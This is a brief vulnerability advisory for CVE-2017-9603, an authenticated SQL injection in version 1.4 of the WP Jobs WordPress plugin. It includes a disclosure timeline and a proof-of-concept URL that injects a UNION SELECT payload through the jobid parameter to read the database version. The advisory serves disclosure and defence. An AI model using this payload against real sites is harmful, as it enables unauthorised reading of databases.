Exploits

CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)

Identification Date: 11/06/2017
Vendor Homepage: http://www.intensewp.com/
Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/

Description

SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter.

Proof of Concept

In order to replay the attack, use the link below.

http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL– comment

The results of the SQL injection are being reflected in the Email input field.

Timeline

  • 11/06/2017 – Identification of the Vulnerability
  • 12/06/2017 – Speak with the developer
  • 12/06/2017 – Request for CVE
  • 12/06/2017 – Contact with WordPress
  • 12/06/2017 – A new version of the plug-in has been released

 

References